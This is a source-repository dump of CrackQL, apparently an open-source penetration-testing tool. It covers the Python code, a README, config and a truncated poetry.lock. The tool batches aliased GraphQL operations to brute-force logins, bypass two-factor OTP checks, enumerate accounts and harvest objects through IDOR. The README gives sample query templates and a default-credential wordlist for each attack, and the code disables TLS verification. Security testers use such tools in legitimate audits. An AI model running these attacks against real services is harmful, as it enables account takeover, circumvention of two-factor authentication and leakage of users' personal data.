├── .gitignore ├── CrackQL.py ├── LICENSE ├── README.md ├── config.py ├── lib ├── generator.py ├── helpers.py ├── parser.py └── validations.py ├── poetry.lock ├── pyproject.toml ├── requirements.txt ├── sample-inputs └── usernames_and_passwords.csv ├── sample-queries ├── enumeration.graphql.md ├── idor.graphql.md ├── login.graphql └── otp-bypass.graphql.md ├── static ├── CrackQL-Banner.png └── CrackQL.png └── version.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | results/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | cover/ 54 | 55 | # Translations 56 | *.mo 57 | *.pot 58 | 59 | # Django stuff: 60 | *.log 61 | local_settings.py 62 | db.sqlite3 63 | db.sqlite3-journal 64 | 65 | # Flask stuff: 66 | instance/ 67 | .webassets-cache 68 | 69 | # Scrapy stuff: 70 | .scrapy 71 | 72 | # Sphinx documentation 73 | docs/_build/ 74 | 75 | # PyBuilder 76 | .pybuilder/ 77 | target/ 78 | 79 | # Jupyter Notebook 80 | .ipynb_checkpoints 81 | 82 | # IPython 83 | profile_default/ 84 | ipython_config.py 85 | 86 | # pyenv 87 | # For a library or package, you might want to ignore these files since the code is 88 | # intended to run in multiple environments; otherwise, check them in: 89 | # .python-version 90 | 91 | # pipenv 92 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 93 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 94 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 95 | # install all needed dependencies. 96 | #Pipfile.lock 97 | 98 | # poetry 99 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 100 | # This is especially recommended for binary packages to ensure reproducibility, and is more 101 | # commonly ignored for libraries. 102 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 103 | #poetry.lock 104 | 105 | # pdm 106 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 107 | #pdm.lock 108 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 109 | # in version control. 110 | # https://pdm.fming.dev/#use-with-ide 111 | .pdm.toml 112 | 113 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 114 | __pypackages__/ 115 | 116 | # Celery stuff 117 | celerybeat-schedule 118 | celerybeat.pid 119 | 120 | # SageMath parsed files 121 | *.sage.py 122 | 123 | # Environments 124 | .env 125 | .venv 126 | env/ 127 | venv/ 128 | ENV/ 129 | env.bak/ 130 | venv.bak/ 131 | 132 | # Spyder project settings 133 | .spyderproject 134 | .spyproject 135 | 136 | # Rope project settings 137 | .ropeproject 138 | 139 | # mkdocs documentation 140 | /site 141 | 142 | # mypy 143 | .mypy_cache/ 144 | .dmypy.json 145 | dmypy.json 146 | 147 | # Pyre type checker 148 | .pyre/ 149 | 150 | # pytype static type analyzer 151 | .pytype/ 152 | 153 | # Cython debug symbols 154 | cython_debug/ 155 | 156 | # PyCharm 157 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 158 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 159 | # and can be added to the global gitignore or merged into this file. For a more nuclear 160 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 161 | #.idea/ -------------------------------------------------------------------------------- /CrackQL.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import csv 4 | import math 5 | import time 6 | import jinja2 7 | import graphql 8 | import uuid 9 | import json 10 | 11 | from optparse import OptionParser 12 | from version import VERSION 13 | from lib.validations import verify_url, verify_inputs 14 | from lib.parser import get_root_type, get_csv_row_count, get_operation, parse_data_response, parse_error_response 15 | from lib.generator import generate_payload, send_payload, stringify, intify, floatify 16 | from lib.helpers import print_output 17 | from graphql.language import print_ast 18 | from pprint import pprint 19 | from urllib.parse import urlparse 20 | 21 | 22 | def main(): 23 | # Get arguments 24 | 25 | parser = OptionParser( 26 | usage='python3 %prog -t http://example.com/graphql -q sample-queries/login.graphql -i sample-inputs/usernames_and_passwords.csv' 27 | ) 28 | parser.add_option( 29 | '-t', 30 | '--target', 31 | dest='url', 32 | help='Target url with a path to the GraphQL endpoint' 33 | ) 34 | parser.add_option( 35 | '-q', 36 | '--query', 37 | dest='query', 38 | help='Input query or mutation operation with variable payload markers' 39 | ) 40 | parser.add_option( 41 | '-i', 42 | '--input-csv', 43 | dest='input_csv', 44 | help='Path to a csv list of arguments (i.e. 
usernames, emails, ids, passwords, otp_tokens, etc.)' 45 | ) 46 | parser.add_option( 47 | '-d', 48 | '--delimiter', 49 | dest='delimiter', 50 | help='CSV input delimiter (default: ",")', 51 | default=',' 52 | ) 53 | parser.add_option( 54 | '-o', 55 | '--output-directory', 56 | dest='output_directory', 57 | help='Output directory to store results (default: ./results/[domain]_[uuid]/', 58 | ) 59 | parser.add_option( 60 | '-b', 61 | '--batch-size', 62 | dest='batch_size', 63 | help='Number of batch operations per GraphQL document request (default: 100)', 64 | default=1000 65 | ) 66 | parser.add_option( 67 | '-D', 68 | '--delay', 69 | dest='delay', 70 | help='Time delay in seconds between batch requests (default: 0)', 71 | default=0 72 | ) 73 | parser.add_option( 74 | '--verbose', 75 | action='store_true', 76 | dest='verbose', 77 | help='Prints out verbose messaging', 78 | default=False 79 | ) 80 | 81 | parser.add_option( 82 | '-v', 83 | '--version', 84 | action='store_true', 85 | dest='version', 86 | help='Print out the current version and exit.', 87 | default=False 88 | ) 89 | 90 | options, args = parser.parse_args() 91 | 92 | print('[+] Starting CrackQL...') 93 | 94 | # Verify required arguments exist 95 | 96 | if options.version: 97 | print('version:', VERSION) 98 | sys.exit(0) 99 | 100 | if not options.url: 101 | parser.error('Target URL (-t) not given') 102 | parser.print_help() 103 | sys.exit(1) 104 | 105 | if not options.query: 106 | parser.error('GraphQL query operation (-q) not given ') 107 | parser.print_help() 108 | sys.exit(1) 109 | 110 | if not options.input_csv: 111 | parser.error('Input file (-i) not given') 112 | parser.print_help() 113 | sys.exit(1) 114 | 115 | print_output('[*] Validating URL and CSV Inputs...', options.verbose) 116 | 117 | # Verify Target GraphQL Endpoint 118 | 119 | if not verify_url(options.url): 120 | sys.exit(1) 121 | 122 | # Verify Input CSV exists and is correct csv format 123 | 124 | if not verify_inputs(options.query, options.input_csv, options.delimiter): 125 | sys.exit(1) 126 | 127 | print_output('[*] Generating Batch Queries Payloads...', options.verbose) 128 | 129 | env = jinja2.Environment(autoescape=False) 130 | env.filters['str'] = stringify 131 | env.filters['int'] = intify 132 | env.filters['float'] = floatify 133 | 134 | with open(options.query, 'r') as file: 135 | query_data = file.read() 136 | 137 | # Store root operation type 138 | root_type = get_root_type(query_data) 139 | 140 | batch_operations = '' 141 | alias_id = 1 142 | batches_sent = 0 143 | csv_rows = get_csv_row_count(options.input_csv, options.delimiter) 144 | total_requests_to_send = math.ceil(csv_rows / int(options.batch_size)) 145 | data_results = [] 146 | error_results = [] 147 | raw_data = [] 148 | raw_errors = [] 149 | initial_query = open(options.query, 'r').read() 150 | ast = None 151 | 152 | with open(options.input_csv, newline='') as csvfile: 153 | reader = csv.DictReader(csvfile, delimiter=options.delimiter, skipinitialspace=True) 154 | reader2 = csv.DictReader(csvfile, delimiter=options.delimiter, skipinitialspace=True) 155 | suffix = 0 156 | count = 0 157 | variables_list = [] 158 | for variables in reader: 159 | count += 1 160 | variables_list.append(variables) 161 | template = env.from_string(initial_query) 162 | query = template.render(variables) 163 | ast = graphql.parse(query) 164 | 165 | """Add Aliases to each field node""" 166 | for definition in ast.definitions: 167 | 168 | for a in definition.selection_set.selections: 169 | suffix += 1 170 | a.alias = 
graphql.language.ast.NameNode() 171 | a.alias.value = 'alias' + str(suffix) 172 | 173 | batch_operations = batch_operations +'\n'+ get_operation(print_ast(ast)) 174 | 175 | if (count +1) > (int(options.batch_size) * (batches_sent + 1)): 176 | batches_sent += 1 177 | time.sleep(int(options.delay)) 178 | payload = generate_payload(batch_operations, root_type) 179 | response = send_payload(options.url, payload, batches_sent, total_requests_to_send, options.verbose) 180 | raw_data, data_results = parse_data_response(response, raw_data, data_results, variables) 181 | raw_errors, error_results = parse_error_response(response, raw_errors, error_results, variables) 182 | batch_operations = '' 183 | 184 | if batches_sent != total_requests_to_send: 185 | batches_sent += 1 186 | time.sleep(int(options.delay)) 187 | payload = generate_payload(batch_operations, root_type) 188 | response = send_payload(options.url, payload, batches_sent, total_requests_to_send, options.verbose) 189 | raw_data, data_results = parse_data_response(response, raw_data, data_results, variables, False, variables_list) 190 | raw_errors, error_results = parse_error_response(response, raw_errors, error_results, variables, False, variables_list) 191 | batch_operations = '' 192 | 193 | 194 | print_output('===============================\nResults:\n', options.verbose) 195 | 196 | if options.verbose: 197 | print("Data:") 198 | pprint(data_results) 199 | 200 | print("Errors:") 201 | pprint(error_results) 202 | 203 | if options.output_directory: 204 | directory = options.output_directory 205 | else: 206 | directory = 'results/' + urlparse(options.url).netloc + '_' + str(uuid.uuid4())[0:6] 207 | print('[*] Writing to directory', directory) 208 | if not os.path.exists(directory): 209 | os.makedirs(directory, exist_ok=True) 210 | 211 | if raw_data: 212 | f = open(directory + '/data.json', 'w') 213 | json.dump(data_results, f) 214 | f.close() 215 | 216 | if raw_errors: 217 | f = open(directory + '/errors.json', 'w') 218 | f.write(str(raw_errors)) 219 | f.close() 220 | 221 | 222 | if __name__ == '__main__': 223 | main() 224 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2021, CrackQL 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | CrackQL 2 | ======= 3 | CrackQL is a GraphQL password brute-force and fuzzing utility. 4 | 5 |
46 | mutation { 47 | login(username: {{username|str}}, password: {{password|str}}) { 48 | accessToken 49 | } 50 | } 51 | 52 | 53 | ### Two-factor Authentication OTP Bypass 54 | 55 | It is possible to use CrackQL to bypass two-factor authentication by submitting many OTP (one-time password) tokens from an input CSV in batched requests. 56 | 57 | [sample-queries/otp-bypass.graphql](sample-queries/otp-bypass.graphql) 58 |
59 | mutation { 60 | twoFactor(otp: {{otp|int}}) { 61 | accessToken 62 | } 63 | } 64 | 65 | 66 | ### User Account Enumeration 67 | 68 | CrackQL can also be used for enumeration attacks to discover valid user IDs, usernames, and email addresses. 69 | 70 | [sample-queries/enumeration.graphql](sample-queries/enumeration.graphql) 71 |
72 | query { 73 | signup(email: {{email|str}}, password: {{password|str}}) { 74 | user { 75 | email 76 | } 77 | } 78 | } 79 | 80 | 81 | ### Insecure Direct Object Reference 82 | 83 | CrackQL can also be used to iterate over a large number of potential unique identifiers in order to leak object information. 84 | 85 | [sample-queries/idor.graphql](sample-queries/idor.graphql) 86 |
87 | query { 88 | profile(uuid: {{uuid|int}}) { 89 | name 90 | email 91 | picture 92 | } 93 | } 94 | 95 | 96 | ### General Fuzzing 97 | 98 | CrackQL can be used for general input fuzzing operations, such as sending potential SQLi and XSS payloads. 99 | 100 | ## Inputs 101 | 102 | CrackQL generates payloads from input variables defined in a CSV file. Each CSV column header must match the corresponding variable name used in the query template. 103 | 104 | [sample-inputs/usernames_and_passwords.csv](sample-inputs/usernames_and_passwords.csv) 105 |
106 | username, password 107 | admin, admin 108 | admin, password 109 | admin, pass 110 | admin, pass123 111 | admin, password123 112 | operator, operator 113 | operator, password 114 | operator, pass 115 | operator, pass123 116 | operator, password123 117 |118 | 119 | #### Valid input types 120 | - `str` 121 | - `int` 122 | - `float` 123 | 124 | ## Installation 125 | 126 | ### Requirements 127 | - Python3 128 | - Requests 129 | - GraphQL 130 | - Jinja 131 | 132 | ### Clone Repository 133 | ``` 134 | git clone git@github.com:nicholasaleks/CrackQL.git 135 | ``` 136 | 137 | ### Get Dependencies 138 | `pip install -r requirements.txt` 139 | 140 | ### Run CrackQL 141 | `python3 CrackQL.py -h` 142 | 143 | ``` 144 | Usage: python3 CrackQL.py -t http://example.com/graphql -q sample-queries/login.graphql -i sample-inputs/usernames_and_passwords.csv 145 | 146 | Options: 147 | -h, --help show this help message and exit 148 | -t URL, --target=URL Target url with a path to the GraphQL endpoint 149 | -q QUERY, --query=QUERY 150 | Input query or mutation operation with variable 151 | payload markers 152 | -i INPUT_CSV, --input-csv=INPUT_CSV 153 | Path to a csv list of arguments (i.e. usernames, 154 | emails, ids, passwords, otp_tokens, etc.) 155 | -d DELIMITER, --delimiter=DELIMITER 156 | CSV input delimiter (default: ",") 157 | -o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY 158 | Output directory to store results (default: 159 | ./results/[domain]_[uuid]/ 160 | -b BATCH_SIZE, --batch-size=BATCH_SIZE 161 | Number of batch operations per GraphQL document 162 | request (default: 100) 163 | -D DELAY, --delay=DELAY 164 | Time delay in seconds between batch requests (default: 165 | 0) 166 | --verbose Prints out verbose messaging 167 | -v, --version Print out the current version and exit. 168 | ``` 169 | 170 | ## Configuration 171 | Use `config.py` to set HTTP cookies, headers or proxies if the endpoint requires authentication. 
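For reference, below is a minimal sketch of what a populated `config.py` could look like. The header name, cookie name, token placeholders, and proxy address are illustrative assumptions only, not values shipped with CrackQL; substitute whatever your target actually requires. CrackQL hands these dictionaries directly to `requests.post()` as `headers=`, `cookies=`, and `proxies=`.

```python
# config.py -- example values only (placeholders, not shipped defaults).
# lib/generator.py and lib/validations.py pass these dicts straight to
# requests.post(), so any mapping accepted by the requests library works.

HEADERS = {'Authorization': 'Bearer <access-token>'}   # e.g. a bearer-token header
COOKIES = {'session': '<session-cookie-value>'}        # e.g. an authenticated session cookie
PROXIES = {
    'http': 'http://127.0.0.1:8080',                   # e.g. route traffic through a local intercepting proxy
    'https': 'http://127.0.0.1:8080',
}
```

Leaving any of these dictionaries empty (`{}`) simply sends the request without that option.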
172 | 173 | ## Maintainers 174 | * [Nick Aleks](https://github.com/nicholasaleks) 175 | * [Dolev Farhi](https://github.com/dolevf) 176 | 177 | ## Mentions 178 | * [Kitploit](https://www.kitploit.com/2022/07/crackql-graphql-password-brute-force.html) 179 | -------------------------------------------------------------------------------- /config.py: -------------------------------------------------------------------------------- 1 | HEADERS = {} 2 | COOKIES = {} 3 | PROXIES = {} 4 | -------------------------------------------------------------------------------- /lib/generator.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import config 3 | import requests 4 | 5 | from lib.parser import indent 6 | from lib.validations import verify_query 7 | from lib.helpers import print_output 8 | 9 | 10 | def stringify(text): 11 | ''' 12 | Custom jinja filter used to wrap strings 13 | ''' 14 | return '"{}"'.format(text) 15 | 16 | def intify(text): 17 | ''' 18 | Custom jinja filter used to assign integers 19 | ''' 20 | return int(text) 21 | 22 | 23 | def floatify(text): 24 | ''' 25 | Custom jinja filter used to assign floats 26 | ''' 27 | return float(text) 28 | 29 | def generate_payload(batch_operations, root_type): 30 | ''' 31 | Takes the total batch of alias operations and wraps it with the original root type 32 | ''' 33 | operation_body = indent(batch_operations, 4) 34 | return root_type + operation_body + '\n}' 35 | 36 | def send_payload(url, payload, batches_sent, total_requests_to_send, verbose=False): 37 | ''' 38 | Sends a packaged GraphQL query with populated payload in a single batch request 39 | ''' 40 | 41 | print_output('[+] Payload {num}: \n{payload}'.format(payload=payload, num=batches_sent), verbose) 42 | 43 | print_output('[+] Verifying Payload Batch Operation...', verbose) 44 | if not verify_query(payload, query_format='String'): 45 | print('Error: Bad GraphQL Query - Check Query and/or Payloads') 46 | sys.exit(1) 47 | 48 | print('[+] Sending Alias Batch {batches_sent} of {total_requests_to_send} to {url}...'.format( 49 | batches_sent=batches_sent, 50 | total_requests_to_send=total_requests_to_send, 51 | url=url 52 | )) 53 | 54 | try: 55 | response = requests.post( 56 | url, 57 | verify=False, 58 | cookies=config.COOKIES, 59 | headers=config.HEADERS, 60 | proxies=config.PROXIES, 61 | timeout=360, 62 | json={'query':payload} 63 | ) 64 | return response.json() 65 | 66 | except Exception as e: 67 | print('Error: {e}'.format(e=e)) 68 | sys.exit(1) 69 | 70 | -------------------------------------------------------------------------------- /lib/helpers.py: -------------------------------------------------------------------------------- 1 | def print_output(message, verbose): 2 | if verbose: 3 | print(message) -------------------------------------------------------------------------------- /lib/parser.py: -------------------------------------------------------------------------------- 1 | import re 2 | import csv 3 | import textwrap 4 | import json 5 | 6 | try: 7 | import textwrap 8 | textwrap.indent 9 | except AttributeError: # undefined function (wasn't added until Python 3.3) 10 | def indent(text, amount, ch=' '): 11 | padding = amount * ch 12 | return ''.join(padding+line for line in text.splitlines(True)) 13 | else: 14 | def indent(text, amount, ch=' '): 15 | return textwrap.indent(text, amount * ch) 16 | 17 | def get_root_type(query_data): 18 | ''' 19 | Extracts the root operation type from the input query 20 | ''' 21 | first = 
query_data.split('\n', 1)[0] 22 | return first 23 | 24 | def get_operation(query_data): 25 | first = query_data.split('\n', 1)[1] 26 | last = first[:first.rfind('\n')] 27 | return textwrap.dedent(last) 28 | 29 | def get_variable_type(query_data, variable): 30 | ''' 31 | Identifies if jinja variables from CSV header exist in query 32 | ''' 33 | regex = r"\{\{.*" + re.escape(variable) + r".*\|(str|int|float)\}\}" 34 | try: 35 | return re.search(regex, query_data).group(1) 36 | except: 37 | return False 38 | 39 | def get_csv_row_count(csv_input, delimiter): 40 | ''' 41 | Return to total number of rows in the CSV (minus header) 42 | ''' 43 | csv_line_count = -1 44 | with open(csv_input, newline='') as csvfile: 45 | reader = csv.reader(csvfile, delimiter=delimiter) 46 | for row in reader: 47 | if any(row): 48 | csv_line_count+=1 49 | 50 | return csv_line_count 51 | 52 | def get_variables(csv_input, delimiter): 53 | ''' 54 | Return the variable names from the header of CSV 55 | ''' 56 | with open(csv_input, newline='') as csvfile: 57 | reader = csv.reader(csvfile, delimiter=delimiter) 58 | list_of_column_names = [] 59 | for row in reader: 60 | list_of_column_names = row 61 | break 62 | return list_of_column_names 63 | 64 | def parse_data_response(response, raw_data, data_results, inputs, verbose=False, variables_list=None): 65 | ''' 66 | Packages the responses from the batched queries and returns both raw and formated data 67 | ''' 68 | 69 | data_result = {} 70 | 71 | try: 72 | data = response.get('data') 73 | if isinstance(data, dict): 74 | raw_data.append(data) 75 | 76 | for count, (name, data_value) in enumerate(data.items()): 77 | current_input = variables_list[count] if variables_list else inputs 78 | data_result = { 79 | name: { 80 | 'inputs': current_input, 81 | 'data': data_value 82 | } 83 | } 84 | data_results.append(data_result) 85 | 86 | except Exception as e: 87 | print(e) 88 | 89 | # Edit the random key by a same key (result) 90 | try: 91 | for key in data_results: 92 | key["result"] = key.pop(next(iter(key))) 93 | 94 | except Exception as e: 95 | print(e) 96 | 97 | return (raw_data, data_results) 98 | 99 | def parse_error_response(response, raw_errors, error_results, inputs, verbose=False, variables_list=None): 100 | ''' 101 | Packages the responses from the batched queries and returns both raw and formated errors 102 | ''' 103 | error_result = {} 104 | try: 105 | if 'errors' in response and isinstance(response['errors'], list): 106 | count = 0 107 | for r in response['errors']: 108 | raw_errors.append(r) 109 | message = r.get('message') 110 | 111 | try: 112 | alias = r.get('path')[0] 113 | except: 114 | alias = 'undefined' 115 | 116 | 117 | error_result[alias] = {} 118 | if variables_list: 119 | error_result[alias]['inputs'] = variables_list[count] 120 | else: 121 | error_result[alias]['inputs'] = inputs 122 | error_result[alias]['error'] = r['message'] 123 | error_results.append(error_result) 124 | error_result = {} 125 | count += 1 126 | 127 | except Exception as e: 128 | print(e) 129 | 130 | return (raw_errors, error_results) 131 | -------------------------------------------------------------------------------- /lib/validations.py: -------------------------------------------------------------------------------- 1 | import config 2 | import csv 3 | import requests 4 | 5 | from graphql import parse 6 | from lib.parser import get_variable_type 7 | 8 | requests.packages.urllib3.disable_warnings() 9 | 10 | def verify_url(url): 11 | ''' 12 | Verifies that the GraphQL endpoint url is 
valid by running a simple test 13 | ''' 14 | query = ''' 15 | query { 16 | __typename 17 | } 18 | ''' 19 | 20 | try: 21 | response = requests.post( 22 | url, 23 | cookies=config.COOKIES, 24 | headers=config.HEADERS, 25 | proxies=config.PROXIES, 26 | verify=False, 27 | timeout=10, 28 | json={'query': query} 29 | ).json() 30 | 31 | if response.get('data'): 32 | if response.get('data', {}).get('__typename', '') in ('Query', 'QueryRoot', 'query_root'): 33 | return True 34 | elif response.get('errors') and (any('locations' in i for i in response['errors']) or (any('extensions' in i for i in response))): 35 | return True 36 | elif response.get('data'): 37 | return True 38 | 39 | except Exception as e: 40 | print('Error: {e}'.format(e=e)) 41 | return False 42 | 43 | 44 | def verify_query(query, query_format='File'): 45 | ''' 46 | Checks whether or not a GraphQL query is formatted correctly 47 | ''' 48 | if query_format == 'File': 49 | with open(query, 'r') as file: 50 | data = file.read() 51 | try: 52 | ast = parse(data) 53 | except Exception as e: 54 | print('Error: Invalid GraphQL Operation \n{data} \n{e}'.format(data=data, e=e)) 55 | return False 56 | elif query_format == 'String': 57 | try: 58 | ast = parse(query) 59 | except Exception as e: 60 | print('Error: Invalid GraphQL Operation \n{data} \n{e}'.format(data=data, e=e)) 61 | return False 62 | return True 63 | 64 | 65 | def verify_inputs(query, csv_input, delimiter): 66 | ''' 67 | Validates CSV inputs to ensure they match payload jinja variables 68 | ''' 69 | with open(csv_input, newline='') as csvfile: 70 | reader = csv.reader(csvfile, delimiter=delimiter, skipinitialspace=True) 71 | list_of_column_names = [] 72 | for row in reader: 73 | list_of_column_names = row 74 | break 75 | 76 | with open(query, 'r') as file: 77 | query_data = file.read() 78 | 79 | for variable in list_of_column_names: 80 | if not get_variable_type(query_data, variable): 81 | print('Error: CSV Header Payload "{variable}" not found in GraphQL operation \n{query_data}'.format( 82 | variable=variable, 83 | query_data=query_data, 84 | ) 85 | ) 86 | print('Please verify the GraphQL operation payloads match the csv header') 87 | return False 88 | 89 | return True 90 | -------------------------------------------------------------------------------- /poetry.lock: -------------------------------------------------------------------------------- 1 | [[package]] 2 | name = "certifi" 3 | version = "2022.6.15" 4 | description = "Python package for providing Mozilla's CA Bundle." 5 | category = "main" 6 | optional = false 7 | python-versions = ">=3.6" 8 | 9 | [[package]] 10 | name = "charset-normalizer" 11 | version = "2.0.12" 12 | description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." 13 | category = "main" 14 | optional = false 15 | python-versions = ">=3.5.0" 16 | 17 | [package.extras] 18 | unicode_backport = ["unicodedata2"] 19 | 20 | [[package]] 21 | name = "graphql-core" 22 | version = "3.2.1" 23 | description = "GraphQL implementation for Python, a port of GraphQL.js, the JavaScript reference implementation for GraphQL." 
24 | category = "main" 25 | optional = false 26 | python-versions = ">=3.6,<4" 27 | 28 | [[package]] 29 | name = "idna" 30 | version = "3.3" 31 | description = "Internationalized Domain Names in Applications (IDNA)" 32 | category = "main" 33 | optional = false 34 | python-versions = ">=3.5" 35 | 36 | [[package]] 37 | name = "jinja2" 38 | version = "3.0.3" 39 | description = "A very fast and expressive template engine." 40 | category = "main" 41 | optional = false 42 | python-versions = ">=3.6" 43 | 44 | [package.dependencies] 45 | MarkupSafe = ">=2.0" 46 | 47 | [package.extras] 48 | i18n = ["Babel (>=2.7)"] 49 | 50 | [[package]] 51 | name = "markupsafe" 52 | version = "2.0.1" 53 | description = "Safely add untrusted strings to HTML/XML markup." 54 | category = "main" 55 | optional = false 56 | python-versions = ">=3.6" 57 | 58 | [[package]] 59 | name = "requests" 60 | version = "2.27.1" 61 | description = "Python HTTP for Humans." 62 | category = "main" 63 | optional = false 64 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" 65 | 66 | [package.dependencies] 67 | certifi = ">=2017.4.17" 68 | charset-normalizer = {version = ">=2.0.0,<2.1.0", markers = "python_version >= \"3\""} 69 | idna = {version = ">=2.5,<4", markers = "python_version >= \"3\""} 70 | urllib3 = ">=1.21.1,<1.27" 71 | 72 | [package.extras] 73 | socks = ["PySocks (>=1.5.6,!=1.5.7)", "win-inet-pton"] 74 | use_chardet_on_py3 = ["chardet (>=3.0.2,<5)"] 75 | 76 | [[package]] 77 | name = "typing-extensions" 78 | version = "4.1.1" 79 | description = "Backported and Experimental Type Hints for Python 3.6+" 80 | category = "main" 81 | optional = false 82 | python-versions = ">=3.6" 83 | 84 | [[package]] 85 | name = "urllib3" 86 | version = "1.26.11" 87 | description = "HTTP library with thread-safe connection pooling, file post, and more." 
88 | category = "main" 89 | optional = false 90 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, <4" 91 | 92 | [package.extras] 93 | brotli = ["brotlicffi (>=0.8.0)", "brotli (>=1.0.9)", "brotlipy (>=0.6.0)"] 94 | secure = ["pyOpenSSL (>=0.14)", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "certifi", "ipaddress"] 95 | socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"] 96 | 97 | [metadata] 98 | lock-version = "1.1" 99 | python-versions = "^3.6.0" 100 | content-hash = "dd55f087945ab0c13720378e26ab1e2b37441c14305de52e099a4f3f7a03f0ab" 101 | 102 | [metadata.files] 103 | certifi = [ 104 | {file = "certifi-2022.6.15-py3-none-any.whl", hash = "sha256:fe86415d55e84719d75f8b69414f6438ac3547d2078ab91b67e779ef69378412"}, 105 | {file = "certifi-2022.6.15.tar.gz", hash = "sha256:84c85a9078b11105f04f3036a9482ae10e4621616db313fe045dd24743a0820d"}, 106 | ] 107 | charset-normalizer = [ 108 | {file = "charset-normalizer-2.0.12.tar.gz", hash = "sha256:2857e29ff0d34db842cd7ca3230549d1a697f96ee6d3fb071cfa6c7393832597"}, 109 | {file = "charset_normalizer-2.0.12-py3-none-any.whl", hash = "sha256:6881edbebdb17b39b4eaaa821b438bf6eddffb4468cf344f09f89def34a8b1df"}, 110 | ] 111 | graphql-core = [ 112 | {file = "graphql-core-3.2.1.tar.gz", hash = "sha256:9d1bf141427b7d54be944587c8349df791ce60ade2e3cccaf9c56368c133c201"}, 113 | {file = "graphql_core-3.2.1-py3-none-any.whl", hash = "sha256:f83c658e4968998eed1923a2e3e3eddd347e005ac0315fbb7ca4d70ea9156323"}, 114 | ] 115 | idna = [ 116 | {file = "idna-3.3-py3-none-any.whl", hash = "sha256:84d9dd047ffa80596e0f246e2eab0b391788b0503584e8945f2368256d2735ff"}, 117 | {file = "idna-3.3.tar.gz", hash = "sha256:9d643ff0a55b762d5cdb124b8eaa99c66322e2157b69160bc32796e824360e6d"}, 118 | ] 119 | jinja2 = [ 120 | {file = "Jinja2-3.0.3-py3-none-any.whl", hash = "sha256:077ce6014f7b40d03b47d1f1ca4b0fc8328a692bd284016f806ed0eaca390ad8"}, 121 | {file = "Jinja2-3.0.3.tar.gz", hash = "sha256:611bb273cd68f3b993fabdc4064fc858c5b47a973cb5aa7999ec1ba405c87cd7"}, 122 | ] 123 | markupsafe = [ 124 | {file = "MarkupSafe-2.0.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d8446c54dc28c01e5a2dbac5a25f071f6653e6e40f3a8818e8b45d790fe6ef53"}, 125 | {file = "MarkupSafe-2.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:36bc903cbb393720fad60fc28c10de6acf10dc6cc883f3e24ee4012371399a38"}, 126 | {file = 